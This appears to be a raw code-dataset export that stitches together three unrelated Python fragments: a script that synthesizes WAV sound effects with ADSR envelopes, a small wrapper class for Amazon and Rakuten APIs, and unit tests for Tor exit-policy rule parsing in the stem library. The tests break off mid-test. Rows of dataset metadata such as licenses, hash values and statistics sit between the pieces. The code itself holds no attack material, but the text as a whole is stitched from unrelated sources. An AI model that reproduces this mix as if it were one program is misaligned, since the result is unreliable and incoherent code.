w.write('msgNeg4.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(-6./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('perda.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1, tab=D_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(-6./12)),fv=0.,nu=0.,d=.1,tab=D_i),S=-3.,R=10.),
))))
w.write('ganho.wav', f_a, N(H((
adsr(v(f=840.*(2**(-7./12)),fv=0.,nu=0.,d=.1,tab=D_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1, tab=D_i),S=-3.,R=10.),
))))
w.write('ganho2.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.075, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.025, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.05, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.05, tab=D_i),S=-3.,R=5.,A=5.,D=10.),
))))
w.write('ganho3.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.75, tab=D_i),S=-9.,R=10.,A=5.,D=610.),
adsr(v(f=240.*(2.**(-7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.5, tab=D_i), S=-9.,R=10.,A=5., D=410.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.5, tab=D_i), S=-9.,R=5.,A=5., D=410.),
))))
w.write('ganho4.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(-7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganho5.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganho6.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda2.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=60.)+
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(3./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda3.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=60.)+
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
))))
w.write('perda4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(3./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda5.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX2.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX3.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perdaX4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)) , fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=100.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)), fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)) , fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)), fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=100.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)), fv=100. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)), fv=100. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perdaX5.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)) , fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=200.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)), fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)) , fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)), fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=200.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)), fv=200. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)), fv=200. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.65, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.65, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame2.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame3.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*3, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(2./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*3, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
# open all the gritoFala* files
# run them through a band-pass that only lets some mids through
# save them as tv_gritoFala*
#
#c = n.zeros(len(coefs))
#c[1000:10000] = n.exp(1j*n.random.uniform(0, 2*n.pi, 9000))
#
## real par, imaginaria impar
#c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
# n.imag(c[1:Lambda/2])[::-1]
#
#resp_imp= n.fft.ifft(c)
#resp_imp_= n.real(resp_imp)
#import os
#
#ll=os.listdir(".")
#ll=[lll for lll in ll if "gritoFala" in lll]
#for i in ll:
# print i
# foo=n.convolve(w.read("%s"%(i,))[1],resp_imp)
# w.write('tv_%s'%(i,), f_a, N(foo))
# print i
#
|
unlicense
| 4,547,374,845,288,080,000
| 45.390826
| 216
| 0.425859
| false
| 1.993063
| false
| false
| false
|
AkihikoITOH/capybara
|
capybara/capybara.py
|
1
|
1091
|
#!/bin/python
# -*- coding: utf-8 -*-
import os
from amazon_wrapper import AmazonWrapper
from rakuten_wrapper import RakutenWrapper
class Capybara:
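    """Thin facade over the per-service API wrappers: loads each service's
    config and token files from the given directories and dispatches item
    lookups through get()."""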
def __init__(self, config_dir=None, tokens_dir=None):
self.wrappers = {}
self.wrappers['amazon'] = AmazonWrapper()
self.wrappers['rakuten'] = RakutenWrapper()
for service, wrapper in self.wrappers.items():
config_filename = './%s_config.json' % service
tokens_filename = './%s_tokens.tsv' % service
config_path = os.path.normpath(os.path.join(os.getcwd(), config_dir, config_filename))
tokens_path = os.path.normpath(os.path.join(os.getcwd(), tokens_dir, tokens_filename))
wrapper.setup(config_path, tokens_path)
def get(self, service=None, item=None):
return self.wrappers[service].access_wrapper({'item': item})
def isAvailable(self, service=None):
if service is None:
return False
        try:
            if self.wrappers[service]:
                return True
        except KeyError:
            pass
        return False
|
mit
| -303,462,010,463,526,900
| 33.09375
| 98
| 0.613199
| false
| 3.855124
| true
| false
| false
|
eoinof/stem
|
test/unit/exit_policy/rule.py
|
1
|
10901
|
"""
Unit tests for the stem.exit_policy.ExitPolicyRule class.
"""
import unittest
from stem.exit_policy import AddressType, ExitPolicyRule
class TestExitPolicyRule(unittest.TestCase):
def test_accept_or_reject(self):
self.assertTrue(ExitPolicyRule("accept *:*").is_accept)
self.assertFalse(ExitPolicyRule("reject *:*").is_accept)
invalid_inputs = (
"accept",
"reject",
"accept *:*",
"accept\t*:*",
"accept\n*:*",
"acceptt *:*",
"rejectt *:*",
"blarg *:*",
" *:*",
"*:*",
"",
)
for rule_arg in invalid_inputs:
self.assertRaises(ValueError, ExitPolicyRule, rule_arg)
def test_str_unchanged(self):
# provides a series of test inputs where the str() representation should
# match the input rule
test_inputs = (
"accept *:*",
"reject *:*",
"accept *:80",
"accept *:80-443",
"accept 127.0.0.1:80",
"accept 87.0.0.1/24:80",
"accept 156.5.38.3/255.255.0.255:80",
"accept [FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF]:80",
"accept [FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF]/32:80",
)
for rule_arg in test_inputs:
rule = ExitPolicyRule(rule_arg)
self.assertEquals(rule_arg, rule.rule)
self.assertEquals(rule_arg, str(rule))
def test_str_changed(self):
# some instances where our rule is valid but won't match our str() representation
test_inputs = {
"accept 10.0.0.1/32:80": "accept 10.0.0.1:80",
"accept 192.168.0.1/255.255.255.0:80": "accept 192.168.0.1/24:80",
"accept [::]/32:*": "accept [0000:0000:0000:0000:0000:0000:0000:0000]/32:*",
"accept [::]/128:*": "accept [0000:0000:0000:0000:0000:0000:0000:0000]:*",
}
for rule_arg, expected_str in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
self.assertEquals(rule_arg, rule.rule)
self.assertEquals(expected_str, str(rule))
def test_valid_wildcard(self):
test_inputs = {
"reject *:*": (True, True),
"reject *:80": (True, False),
"accept 192.168.0.1:*": (False, True),
"accept 192.168.0.1:80": (False, False),
"reject 127.0.0.1/0:*": (False, True),
"reject 127.0.0.1/16:*": (False, True),
"reject 127.0.0.1/32:*": (False, True),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/0:80": (False, False),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/64:80": (False, False),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/128:80": (False, False),
"accept 192.168.0.1:0-65535": (False, True),
"accept 192.168.0.1:1-65535": (False, True),
"accept 192.168.0.1:2-65535": (False, False),
"accept 192.168.0.1:1-65534": (False, False),
}
for rule_arg, attr in test_inputs.items():
is_address_wildcard, is_port_wildcard = attr
rule = ExitPolicyRule(rule_arg)
self.assertEquals(is_address_wildcard, rule.is_address_wildcard())
self.assertEquals(is_port_wildcard, rule.is_port_wildcard())
def test_invalid_wildcard(self):
test_inputs = (
"reject */16:*",
"reject 127.0.0.1/*:*",
"reject *:0-*",
"reject *:*-15",
)
for rule_arg in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, rule_arg)
def test_wildcard_attributes(self):
rule = ExitPolicyRule("reject *:*")
self.assertEquals(AddressType.WILDCARD, rule.address_type)
self.assertEquals(None, rule.address)
self.assertEquals(None, rule.mask)
self.assertEquals(None, rule.masked_bits)
self.assertEquals(1, rule.min_port)
self.assertEquals(65535, rule.max_port)
def test_valid_ipv4_addresses(self):
test_inputs = {
"0.0.0.0": ("0.0.0.0", "255.255.255.255", 32),
"127.0.0.1/32": ("127.0.0.1", "255.255.255.255", 32),
"192.168.0.50/24": ("192.168.0.50", "255.255.255.0", 24),
"255.255.255.255/0": ("255.255.255.255", "0.0.0.0", 0),
}
for rule_addr, attr in test_inputs.items():
address, mask, masked_bits = attr
rule = ExitPolicyRule("accept %s:*" % rule_addr)
self.assertEquals(AddressType.IPv4, rule.address_type)
self.assertEquals(address, rule.address)
